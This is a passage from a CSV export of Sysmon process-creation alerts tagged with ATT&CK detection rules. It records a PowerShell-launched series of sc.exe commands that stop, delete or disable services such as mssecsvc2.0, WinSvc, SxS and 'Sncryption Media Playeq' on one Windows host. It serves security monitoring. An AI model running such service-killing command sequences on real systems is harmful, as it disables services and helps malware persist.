Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:01.298"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-00101f021e00}"",""processId"":""6880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.387",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.241 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-001073fc1d00} +ProcessId: 4408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.247954500Z"",""eventRecordID"":""2369"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.241\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-001073fc1d00}\r\nProcessId: 4408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.241"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-001073fc1d00}"",""processId"":""4408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.353",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.204 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-00108cfa1d00} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinSvc 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.208607500Z"",""eventRecordID"":""2367"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.204\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-00108cfa1d00}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.204"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-00108cfa1d00}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.341",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.188 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010abf91d00} +ProcessId: 5948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.191353300Z"",""eventRecordID"":""2366"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.188\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010abf91d00}\r\nProcessId: 5948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.188"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010abf91d00}"",""processId"":""5948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.291",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.984 
+ProcessGuid: {df9fc3d3-b378-5ecf-0000-001015f61d00} +ProcessId: 2112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.987161000Z"",""eventRecordID"":""2363"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.984\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001015f61d00}\r\nProcessId: 2112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.984"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001015f61d00}"",""processId"":""2112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:29.243",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.922 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00104af31d00} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.924235700Z"",""eventRecordID"":""2360"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.922\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00104af31d00}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.922"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00104af31d00}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.229",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.905 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00105ff21d00} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Sncryption Media Playeq"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.907766800Z"",""eventRecordID"":""2359"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.905\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00105ff21d00}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 